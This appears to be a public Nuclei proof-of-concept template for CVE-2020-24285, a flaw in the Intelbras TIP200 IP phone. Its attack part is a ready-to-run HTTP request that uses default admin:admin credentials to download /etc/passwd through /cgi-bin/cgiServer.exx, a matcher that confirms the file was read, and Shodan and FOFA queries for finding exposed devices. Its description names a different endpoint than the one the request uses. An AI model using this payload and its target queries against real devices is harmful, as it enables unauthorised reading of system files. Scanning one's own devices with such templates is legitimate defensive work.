INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 is vulnerable to information disclosure, allowing unauthenticated attackers to access sensitive device information and configuration data via a direct request to the /cgi-bin/export_settings.sh endpoint.
PoC代码[已公开]
id: CVE-2020-24285
info:
name: INTELBRAS TELEFONE IP TIP200 60.61.75.22 - Local File Inclusion
author: ritikchaddha
severity: high
description: |
INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 is vulnerable to information disclosure, allowing unauthenticated attackers to access sensitive device information and configuration data via a direct request to the /cgi-bin/export_settings.sh endpoint.
remediation: |
Update the device firmware to the latest version provided by INTELBRAS.
reference:
- https://github.com/SecLoop/CVE/blob/main/telefone_ip_tip200.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-24285
classification:
cve-id: CVE-2020-24285
cwe-id: CWE-200
epss-score: 0.10266
epss-percentile: 0.92885
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
metadata:
vendor: intelbras
product: tip200
max-request: 1
verified: true
shodan-query: html:"/cgi-bin/cgiServer.exx"
fofa-query: body="/cgi-bin/cgiServer.exx"
tags: cve,cve2020,intelbras,telefone,tip200,exposure,lfi
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
GET /cgi-bin/cgiServer.exx?download=/etc/passwd HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
skip-variables-check: true
matchers:
- type: dsl
dsl:
- "contains_all(tolower(header), 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100bb730cbeb644fae313e65b222f5eb2180917342b2a013a8291294dbe746fe44c02205b914eae9e20412d1062868f58ab4a7326e3002e6411dedad3ad77771e54979a:922c64590222798bb761d5b6d8e72950